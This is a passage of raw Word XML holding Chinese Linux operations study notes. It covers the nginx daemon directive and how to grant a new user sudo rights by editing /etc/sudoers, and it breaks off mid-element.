      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73FFA00F" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30AC6533" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B311D8" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C06DC6" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01402AC3" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B5288D" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61E1550E" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C88E965" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6E87AE" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A57FCB1" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C861460" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC88D4D" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE1A86C" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0013A35E" w14:textId="77777777" w:rsidR="00387C81" w:rsidRDefault="00387C81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16EB4928" w14:textId="5038C00D" w:rsidR="00387C81" w:rsidRPr="00387C81" w:rsidRDefault="00387C81" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="189" w:name="_Toc159779649"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RHCA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
    </w:p>
    <w:p w14:paraId="642E5B94" w14:textId="77777777" w:rsidR="00387C81" w:rsidRDefault="00387C81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73396A6C" w14:textId="77777777" w:rsidR="00387C81" w:rsidRDefault="00387C81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07300D2B" w14:textId="77777777" w:rsidR="00387C81" w:rsidRDefault="00387C81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0EFCE3" w14:textId="77777777" w:rsidR="00387C81" w:rsidRDefault="00387C81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3007707E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="190" w:name="_Toc159779650"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运维</w:t>
      </w:r>
      <w:bookmarkEnd w:id="190"/>
    </w:p>
    <w:p w14:paraId="019F5EC2" w14:textId="72CC449F" w:rsidR="00500E45" w:rsidRDefault="00500E45" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172F19EF" w14:textId="26C88311" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="191" w:name="_Toc159779651"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>守护进程（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>daemon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191"/>
    </w:p>
    <w:p w14:paraId="29C27ED4" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC020AB" w14:textId="16A2DE2D" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最开始理解的守护进程模式是软件在后台运行，不显示在前端，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&amp; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以让程序在后台执行。后来了解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> daemon off </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的守护进程命令才知道，守护进程是为了让进程不会被终端产生的信息打断，也不会产生信息在终端上显示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14606D14" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419F9B1F" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>daemon on | off;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230ED79E" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B729CB2" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>daemon on;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F21967" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C55BDC" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E61DFCA" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>守护进程（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>daemon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是脱离终端并且在后台运行的进程。它脱离终端是为了避免进程执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>过程中的信息在任何终端上显示，这样一来，进程也不会被任何终端所产生的信息所打断。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>毫无疑问是一个需要以守护进程方式运行的服务，因此，默认都是以这种方式运行的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD30C31" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A879C66" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F87E4C6" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B60532C" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还是提供了关闭守护进程的模式，之所以提供这种模式，是为了方便跟踪调试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，毕竟用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试进程时最烦琐的就是如何继续跟进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fork</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出的子进程了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00982CC8" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRPr="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5423DE14" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="319E56FF" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B248597" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E5B977" w14:textId="77777777" w:rsidR="00FC5678" w:rsidRDefault="00FC5678" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21716C18" w14:textId="2BB48F4C" w:rsidR="00337BC8" w:rsidRDefault="00337BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="_Toc159779652"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建用户没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>
    </w:p>
    <w:p w14:paraId="572F498E" w14:textId="54626B7B" w:rsidR="007277CC" w:rsidRDefault="00D201CE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候报错</w:t>
      </w:r>
      <w:r w:rsidR="007277CC" w:rsidRPr="004E77FD">
        <w:t>'Username' is not in the sudoers file. This incident will be reported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F53A959" w14:textId="5EC229C5" w:rsidR="00337BC8" w:rsidRDefault="00337BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31BA5EC8" w14:textId="60541100" w:rsidR="00D201CE" w:rsidRDefault="00D201CE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D201CE">
        <w:t>https://blog.csdn.net/sinat_36118270/article/details/62899093</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEE1334" w14:textId="57745D52" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022A85F5" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/etc/sudoers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件默认是只读的，对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来说也是，因此需先添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudoers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的写权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262CE8BC" w14:textId="3461AAEC" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即执行操作：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3B3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>chmod u+w /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDE4885" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudoers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30910463" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即执行：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3B3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vi /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46621D5C" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到这行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> root ALL=(ALL) ALL,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在他下面添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx ALL=(ALL) ALL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是你的用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0D32A1" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5C2D05" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ps:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里说下你可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudoers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加下面四行中任意一条</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7137ED2F" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>youuser ALL=(ALL) ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09931226" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>%youuser ALL=(ALL) ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2BE8D6" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>youuser ALL=(ALL) NOPASSWD: ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319039F4" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>%youuser ALL=(ALL) NOPASSWD: ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050C01D0" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38AE3692" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>youuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要输入密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7046C0" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许用户组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>youuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面的用户执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要输入密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0456E0B6" w14:textId="77777777" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>youuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且在执行的时候不输入密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1200589F" w14:textId="131DEEEE" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第四行</w:t>
      </w:r>
      <w:r>
